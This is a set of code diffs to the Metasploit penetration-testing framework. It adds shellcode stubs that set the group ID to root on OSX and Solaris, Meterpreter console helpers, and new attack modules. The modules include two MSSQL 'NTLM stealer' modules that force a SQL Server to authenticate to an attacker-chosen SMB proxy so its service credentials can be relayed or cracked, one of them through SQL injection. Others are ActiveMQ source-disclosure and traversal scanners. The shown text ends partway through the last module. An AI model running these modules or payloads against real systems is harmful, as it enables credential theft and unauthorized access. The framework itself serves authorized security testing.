@ -40,6 +40,27 @@ module Msf::Payload::Osx
|
|||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetregid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setregid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setgid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('AppendExit',
|
||||
[
|
||||
false,
|
||||
|
@ -99,6 +120,35 @@ module Msf::Payload::Osx
|
|||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7f" +# movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xb5" +# movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
# Append
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
|
|
|
@ -6,10 +6,17 @@ require 'msf/core'
|
|||
###
|
||||
module Msf::Payload::Php
|
||||
|
||||
def initialize(info = {})
|
||||
super(info)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate a chunk of PHP code that should be eval'd before
|
||||
# #php_system_block.
|
||||
#
|
||||
# The generated code will initialize
|
||||
#
|
||||
# @options options [String] :disabled_varname PHP variable name in which to
|
||||
# store an array of disabled functions.
|
||||
#
|
||||
# @returns [String] A chunk of PHP code
|
||||
#
|
||||
def php_preamble(options = {})
|
||||
dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
|
||||
dis = '$' + dis if (dis[0,1] != '$')
|
||||
|
@ -32,6 +39,20 @@ module Msf::Payload::Php
|
|||
return preamble
|
||||
end
|
||||
|
||||
#
|
||||
# Generate a chunk of PHP code that tries to run a command.
|
||||
#
|
||||
# @options options [String] :cmd_varname PHP variable name containing the
|
||||
# command to run
|
||||
# @options options [String] :disabled_varname PHP variable name containing
|
||||
# an array of disabled functions. See #php_preamble
|
||||
# @options options [String] :output_varname PHP variable name in which to
|
||||
# store the output of the command. Will contain 0 if no exec functions
|
||||
# work.
|
||||
#
|
||||
# @returns [String] A chunk of PHP code that, with a little luck, will run a
|
||||
# command.
|
||||
#
|
||||
def php_system_block(options = {})
|
||||
cmd = options[:cmd_varname] || '$cmd'
|
||||
dis = options[:disabled_varname] || @dis || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
|
||||
|
@ -102,12 +123,12 @@ module Msf::Payload::Php
|
|||
# Currently unused until we can figure out how to get output with COM
|
||||
# objects (which are not subject to safe mode restrictions) instead of
|
||||
# PHP functions.
|
||||
win32_com = "
|
||||
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
|
||||
$wscript = new COM('Wscript.Shell');
|
||||
$wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
|
||||
#{output} = file_get_contents('%TEMP%\\out.txt');
|
||||
}else"
|
||||
#win32_com = "
|
||||
# if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
|
||||
# $wscript = new COM('Wscript.Shell');
|
||||
# $wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
|
||||
# #{output} = file_get_contents('%TEMP%\\out.txt');
|
||||
# }else"
|
||||
fail_block = "
|
||||
{
|
||||
#{output}=0;
|
||||
|
|
|
@ -33,6 +33,20 @@ module Msf::Payload::Solaris
|
|||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetregid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setregid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setgid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('AppendExit',
|
||||
[
|
||||
false,
|
||||
|
@ -86,6 +100,22 @@ module Msf::Payload::Solaris
|
|||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xcb" +# movb $0xcb,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x2e" +# movb $0x2e,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
# Append
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
|
|
|
@ -140,6 +140,14 @@ class Plugin
|
|||
output.print_line(msg) if (output)
|
||||
end
|
||||
|
||||
#
|
||||
# Prints a warning
|
||||
#
|
||||
def print_warning(msg='')
|
||||
output.print_warning(msg) if (output)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Prints a message with no decoration.
|
||||
#
|
||||
|
|
|
@ -98,6 +98,10 @@ class BidirectionalPipe < Rex::Ui::Text::Input
|
|||
print_line('[*] ' + msg)
|
||||
end
|
||||
|
||||
def print_warning(msg='')
|
||||
print_warning('[!] ' + msg)
|
||||
end
|
||||
|
||||
#
|
||||
# Wrappers for the pipe_input methods
|
||||
#
|
||||
|
|
|
@ -367,6 +367,17 @@ module PacketDispatcher
|
|||
end
|
||||
end
|
||||
|
||||
# If the backlog and incomplete arrays are the same, it means
|
||||
# dispatch_inbound_packet wasn't able to handle any of the
|
||||
# packets. When that's the case, we can get into a situation
|
||||
# where @pqueue is not empty and, since nothing else bounds this
|
||||
# loop, we spin CPU trying to handle packets that can't be
|
||||
# handled. Sleep here to treat that situation as though the
|
||||
# queue is empty.
|
||||
if (backlog.length > 0 && backlog.length == incomplete.length)
|
||||
::IO.select(nil, nil, nil, 0.10)
|
||||
end
|
||||
|
||||
@pqueue.unshift(*incomplete)
|
||||
|
||||
if(@pqueue.length > 100)
|
||||
|
|
|
@ -43,7 +43,14 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
"-t" => [ true, "The registry value type (E.g. REG_SZ)." ],
|
||||
"-v" => [ true, "The registry value name (E.g. Stuff)." ],
|
||||
"-r" => [ true, "The remote machine name to connect to (with current process credentials" ],
|
||||
"-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ])
|
||||
"-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ])
|
||||
|
||||
@@ps_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ],
|
||||
"-S" => [ true, "Filters processes on the process name using the supplied RegEx"],
|
||||
"-A" => [ true, "Filters processes on architecture (x86 or x86_64)" ],
|
||||
"-s" => [ false, "Show only SYSTEM processes" ],
|
||||
"-U" => [ true, "Filters processes on the user using the supplied RegEx" ])
|
||||
|
||||
#
|
||||
# List of supported commands.
|
||||
|
@ -274,6 +281,54 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
#
|
||||
def cmd_ps(*args)
|
||||
processes = client.sys.process.get_processes
|
||||
@@ps_opts.parse(args) do |opt, idx, val|
|
||||
case opt
|
||||
when "-h"
|
||||
cmd_ps_help
|
||||
return true
|
||||
when "-S"
|
||||
print_line "Filtering on process name..."
|
||||
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
|
||||
processes.each do |proc|
|
||||
if val.nil? or val.empty?
|
||||
print_line "You must supply a search term!"
|
||||
return false
|
||||
end
|
||||
searched_procs << proc if proc["name"].match(/#{val}/)
|
||||
end
|
||||
processes = searched_procs
|
||||
when "-A"
|
||||
print_line "Filtering on arch..."
|
||||
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
|
||||
processes.each do |proc|
|
||||
next if proc['arch'].nil? or proc['arch'].empty?
|
||||
if val.nil? or val.empty? or !(val == "x86" or val == "x86_64")
|
||||
print_line "You must select either x86 or x86_64"
|
||||
return false
|
||||
end
|
||||
searched_procs << proc if proc["arch"] == val
|
||||
end
|
||||
processes = searched_procs
|
||||
when "-s"
|
||||
print_line "Filtering on SYSTEM processes..."
|
||||
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
|
||||
processes.each do |proc|
|
||||
searched_procs << proc if proc["user"] == "NT AUTHORITY\\SYSTEM"
|
||||
end
|
||||
processes = searched_procs
|
||||
when "-U"
|
||||
print_line "Filtering on user name..."
|
||||
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
|
||||
processes.each do |proc|
|
||||
if val.nil? or val.empty?
|
||||
print_line "You must supply a search term!"
|
||||
return false
|
||||
end
|
||||
searched_procs << proc if proc["user"].match(/#{val}/)
|
||||
end
|
||||
processes = searched_procs
|
||||
end
|
||||
end
|
||||
if (processes.length == 0)
|
||||
print_line("No running processes were found.")
|
||||
else
|
||||
|
@ -284,6 +339,15 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
return true
|
||||
end
|
||||
|
||||
def cmd_ps_help
|
||||
print_line "Use the command with no arguments to see all running processes."
|
||||
print_line "The following options can be used to filter those results:"
|
||||
|
||||
print_line @@ps_opts.usage
|
||||
end
|
||||
|
||||
|
||||
|
||||
#
|
||||
# Reboots the remote computer.
|
||||
#
|
||||
|
@ -595,6 +659,7 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
client.sys.power.shutdown
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -1894,11 +1894,11 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
|
|||
last_search_id = sid
|
||||
last_offset = loff
|
||||
last_filename = name
|
||||
if eos != 1 #If we aren't at the end of the search, run find_next
|
||||
if eos == 0 and last_offset != 0 #If we aren't at the end of the search, run find_next
|
||||
resp = find_next(last_search_id, last_offset, last_filename)
|
||||
search_next = 1 # Flip bit so response params will parse correctly
|
||||
end
|
||||
end until eos == 1
|
||||
end until eos != 0 or last_offset == 0
|
||||
rescue ::Exception
|
||||
raise $!
|
||||
end
|
||||
|
|
|
@ -9,6 +9,7 @@ class Base
|
|||
def print_status(msg); end
|
||||
def print_good(msg); end
|
||||
def print_error(msg); end
|
||||
def print_warning(msg); end
|
||||
end
|
||||
|
||||
attr_accessor :client, :framework, :path, :error, :args
|
||||
|
|
|
@ -45,6 +45,12 @@ class Output
|
|||
def print_line(msg='')
|
||||
end
|
||||
|
||||
#
|
||||
# Prints a warning
|
||||
#
|
||||
def print_warning(msg='')
|
||||
end
|
||||
|
||||
#
|
||||
# Prints a message with no decoration.
|
||||
#
|
||||
|
|
|
@ -66,6 +66,16 @@ module Subscriber
|
|||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps user_output.print_warning
|
||||
#
|
||||
def print_warning(msg='')
|
||||
if (user_output)
|
||||
print_blank_line if user_output.prompting?
|
||||
user_output.print_warning(msg)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps user_output.print
|
||||
#
|
||||
|
|
|
@ -81,6 +81,13 @@ module DispatcherShell
|
|||
shell.print_good(msg)
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps shell.print_warning
|
||||
#
|
||||
def print_warning(msg = '')
|
||||
shell.print_warning(msg)
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps shell.print
|
||||
#
|
||||
|
|
|
@ -67,6 +67,10 @@ class Output < Rex::Ui::Output
|
|||
print(msg + "\n")
|
||||
end
|
||||
|
||||
def print_warning(msg = '')
|
||||
print_line("%bld%yel[!]%clr #{msg}")
|
||||
end
|
||||
|
||||
def print(msg = '')
|
||||
print_raw(substitute_colors(msg))
|
||||
end
|
||||
|
|
|
@ -303,6 +303,16 @@ module Shell
|
|||
log_output(output.print_line(msg))
|
||||
end
|
||||
|
||||
#
|
||||
# Prints a warning message to the output handle.
|
||||
#
|
||||
def print_warning(msg='')
|
||||
return if (disable_output == true)
|
||||
|
||||
self.on_print_proc.call(msg) if self.on_print_proc
|
||||
log_output(output.print_warning(msg))
|
||||
end
|
||||
|
||||
#
|
||||
# Prints a raw message to the output handle.
|
||||
#
|
||||
|
|
|
@ -35,13 +35,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Author' => 'jduck',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'Platform' => [ 'win' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '65533'],
|
||||
[ 'URL', 'http://seclists.org/bugtraq/2010/Jun/160' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jun 15 2010'
|
||||
)
|
||||
|
||||
|
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'OSVDB', '73447' ],
|
||||
[ 'CVE', '2008-2938' ],
|
||||
[ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
|
||||
[ 'EDB', 17388 ],
|
||||
[ 'EDB', '17388' ],
|
||||
[ 'BID', '48225' ],
|
||||
],
|
||||
'Author' => [ 'patrick' ],
|
||||
|
|
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['OSVDB', '52048'],
|
||||
['CVE', '2009-0815'],
|
||||
['URL', 'http://secunia.com/advisories/33829/'],
|
||||
['EDB', 8038],
|
||||
['EDB', '8038'],
|
||||
['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 10 2009',
|
||||
|
|
|
@ -0,0 +1,78 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server NTLM Stealer',
|
||||
'Description' => %q{
|
||||
This module can be used to help capture or relay the LM/NTLM credentials of the
|
||||
account running the remote SQL Server service. The module will use the supplied
|
||||
credentials to connect to the target SQL Server instance and execute the native
|
||||
"xp_dirtree" or "xp_fileexist" stored procedure. The stored procedures will then
|
||||
force the service account to authenticate to the system defined in the SMBProxy
|
||||
option. In order for the attack to be successful, the SMB capture or relay module
|
||||
must be running on the system defined as the SMBProxy. The database account used
|
||||
to connect to the database should only require the "PUBLIC" role to execute.
|
||||
Successful execution of this attack usually results in local administrative access
|
||||
to the Windows system. Specifically, this works great for relaying credentials
|
||||
between two SQL Servers using a shared service account to get shells. However, if
|
||||
the relay fails, then the LM hash can be reversed using the Halflm rainbow tables
|
||||
and john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer for the
|
||||
inspiration.
|
||||
},
|
||||
'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
# Reminder
|
||||
print_status("DONT FORGET to run a SMB capture or relay module!")
|
||||
|
||||
# Call auth_force method to execute "xp_dirtree"
|
||||
begin
|
||||
force_auth("xp_dirtree",datastore['SMBPROXY'])
|
||||
return
|
||||
rescue
|
||||
print_error("xp_dirtree failed to initiate authentication to smbproxy.")
|
||||
end
|
||||
|
||||
# Call auth_force method to execute "xp_fileexist" if "xp_dirtree" fails
|
||||
begin
|
||||
force_auth("xp_fileexist",datastore['SMBPROXY'])
|
||||
return
|
||||
rescue
|
||||
print_error("xp_fileexist failed to initiate authentication to smbproxy.")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
# Method to force sql server to authenticate
|
||||
def force_auth(sprocedure,smbproxy)
|
||||
|
||||
print_status("Forcing SQL Server at #{rhost} to auth to #{smbproxy} via #{sprocedure}...")
|
||||
|
||||
# Generate random file name
|
||||
rand_filename = Rex::Text.rand_text_alpha(8, bad='')
|
||||
|
||||
# Setup query
|
||||
sql = "#{sprocedure} '\\\\#{smbproxy}\\#{rand_filename}'"
|
||||
result = mssql_query(sql, false) if mssql_login_datastore
|
||||
column_data = result[:rows]
|
||||
print_good("Successfully executed #{sprocedure} on #{rhost}")
|
||||
print_good("Go check your SMB relay or capture module for goodies!")
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,60 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL_SQLI
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server NTLM Stealer - SQLi',
|
||||
'Description' => %q{
|
||||
This module can be used to help capture or relay the LM/NTLM credentials of the
|
||||
account running the remote SQL Server service. The module will use the SQL
|
||||
injection from GET_PATH to connect to the target SQL Server instance and execute
|
||||
the native "xp_dirtree" or stored procedure. The stored procedures will then
|
||||
force the service account to authenticate to the system defined in the SMBProxy
|
||||
option. In order for the attack to be successful, the SMB capture or relay module
|
||||
must be running on the system defined as the SMBProxy. The database account used to
|
||||
connect to the database should only require the "PUBLIC" role to execute.
|
||||
Successful execution of this attack usually results in local administrative access
|
||||
to the Windows system. Specifically, this works great for relaying credentials
|
||||
between two SQL Servers using a shared service account to get shells. However, if
|
||||
the relay fails, then the LM hash can be reversed using the Halflm rainbow tables
|
||||
and john the ripper.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'nullbind <scott.sutherland[at]netspi.com>',
|
||||
'Antti <antti.rantasaari[at]netspi.com>'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
# Reminder
|
||||
print_status("DONT FORGET to run a SMB capture or relay module!")
|
||||
|
||||
# Generate random file name
|
||||
rand_filename = Rex::Text.rand_text_alpha(8, bad='')
|
||||
|
||||
# Setup query - double escaping backslashes
|
||||
sql = "exec master..xp_dirtree '\\\\\\\\#{datastore['SMBPROXY']}\\#{rand_filename}'"
|
||||
print_status("Attempting to force backend DB to authenticate to the #{datastore['SMBPROXY']}")
|
||||
|
||||
# Execute query to force authentation from backend database to smbproxy
|
||||
mssql_query(sql)
|
||||
end
|
||||
end
|
|
@ -45,7 +45,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1']
|
||||
],
|
||||
# Tested OK against sol8.tor 20100624 -jjd
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jan 22 2003')
|
||||
|
||||
register_options(
|
||||
|
|
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'OSVDB', '71420'],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/' ],
|
||||
[ 'EDB', 17078 ],
|
||||
[ 'EDB', '17078' ],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 28 2011'))
|
||||
|
||||
|
|
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2010-2156' ],
|
||||
[ 'OSVDB', '65246'],
|
||||
[ 'EDB', 14185]
|
||||
[ 'EDB', '14185']
|
||||
]
|
||||
)
|
||||
register_options(
|
||||
|
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2011-0514' ],
|
||||
[ 'OSVDB', '70617' ],
|
||||
[ 'EDB', 15940 ],
|
||||
[ 'EDB', '15940' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jan 8 2011' ))
|
||||
|
||||
|
|
|
@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'URL', 'https://issues.apache.org/bugzilla/show_bug.cgi?id=48509' ],
|
||||
[ 'URL', 'http://www.gossamer-threads.com/lists/apache/cvs/381537' ],
|
||||
[ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-10-002' ],
|
||||
[ 'EDB', 11650 ]
|
||||
[ 'EDB', '11650' ]
|
||||
],
|
||||
'DisclosureDate' => 'Mar 05 2010'))
|
||||
|
||||
|
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'BID', '49303'],
|
||||
[ 'CVE', '2011-3192'],
|
||||
[ 'EDB', 17696],
|
||||
[ 'EDB', '17696'],
|
||||
[ 'OSVDB', '74721' ],
|
||||
],
|
||||
'DisclosureDate' => 'Aug 19 2011'))
|
||||
|
|
|
@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
Code execution may be possible however this module is only a DoS.
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
|
|
@ -40,10 +40,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'OSVDB', '70167' ],
|
||||
[ 'BID', '45542' ],
|
||||
[ 'MSB', 'MS11-004' ],
|
||||
[ 'EDB', 15803 ],
|
||||
[ 'EDB', '15803' ],
|
||||
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx' ]
|
||||
],
|
||||
'Platform' => [ 'win' ],
|
||||
'DisclosureDate' => 'Dec 21 2010'))
|
||||
|
||||
register_options(
|
||||
|
|
|
@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', 16204 ],
|
||||
[ 'EDB', '16204' ],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 22 2011'))
|
||||
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2010-1899' ],
|
||||
[ 'OSVDB', '67978'],
|
||||
[ 'MSB', 'MS10-065'],
|
||||
[ 'EDB', 15167 ]
|
||||
[ 'EDB', '15167' ]
|
||||
],
|
||||
'DisclosureDate' => 'Sep 14 2010'))
|
||||
|
||||
|
|
|
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
|
||||
[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],
|
||||
[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
|
||||
[ 'EDB', 18606 ],
|
||||
[ 'EDB', '18606' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update' ]
|
||||
],
|
||||
'Author' =>
|
||||
|
|
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'BID', '46360' ],
|
||||
[ 'OSVDB', '70881' ],
|
||||
[ 'MSB', 'MS11-019' ],
|
||||
[ 'EDB', 16166 ],
|
||||
[ 'EDB', '16166' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2011/Feb/285' ]
|
||||
],
|
||||
'Author' => [ 'Cupidon-3005', 'jduck' ],
|
||||
|
|
|
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2010-2115' ],
|
||||
[ 'OSVDB', '64845' ],
|
||||
[ 'EDB', 12683 ]
|
||||
[ 'EDB', '12683' ]
|
||||
],
|
||||
'DisclosureDate' => 'May 21 2010'))
|
||||
|
||||
|
|
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 1 $',
|
||||
'Version' => '$Revision$',
|
||||
'DisclosureDate' => 'Jan 19 2012'
|
||||
))
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'IPv6 Link Local/Node Local Ping Discovery',
|
||||
'Version' => '$Revision: 13962 $',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.
|
||||
},
|
||||
|
|
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'H.323 Version Scanner',
|
||||
'Version' => '$Revision: 9804 $',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Detect H.323 Version.',
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE
|
||||
|
|
|
@ -0,0 +1,71 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache ActiveMQ JSP files Source Disclosure',
|
||||
'Description' => %q{
|
||||
This module exploits a source code disclosure in Apache ActiveMQ. The
|
||||
vulnerability is due to the Jetty's ResourceHandler handling of specially crafted
|
||||
URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1
|
||||
over Windows 2003 SP2 and Ubuntu 10.04.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Veerendra G.G', # Vulnerability discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-1587' ],
|
||||
[ 'OSVDB', '64020' ],
|
||||
[ 'BID', '39636' ],
|
||||
[ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8161),
|
||||
OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => "/#{target_uri.to_s}",
|
||||
'method' => 'GET',
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
contents = res.body
|
||||
fname = File.basename(datastore['TARGETURI'])
|
||||
path = store_loot(
|
||||
'apache.activemq',
|
||||
'text/plain',
|
||||
ip,
|
||||
contents,
|
||||
fname
|
||||
)
|
||||
print_status("#{rhost}:#{rport} - File saved in: #{path}")
|
||||
else
|
||||
print_error("#{rhost}:#{rport} - Failed to retrieve file")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
|
@ -0,0 +1,80 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache ActiveMQ Directory Traversal',
|
||||
'Description' => %q{
|
||||
This module exploits a directory traversal vulnerability in Apache ActiveMQ
|
||||
5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's
|
||||
ResourceHandler installed with the affected versions. This module has been tested
|
||||
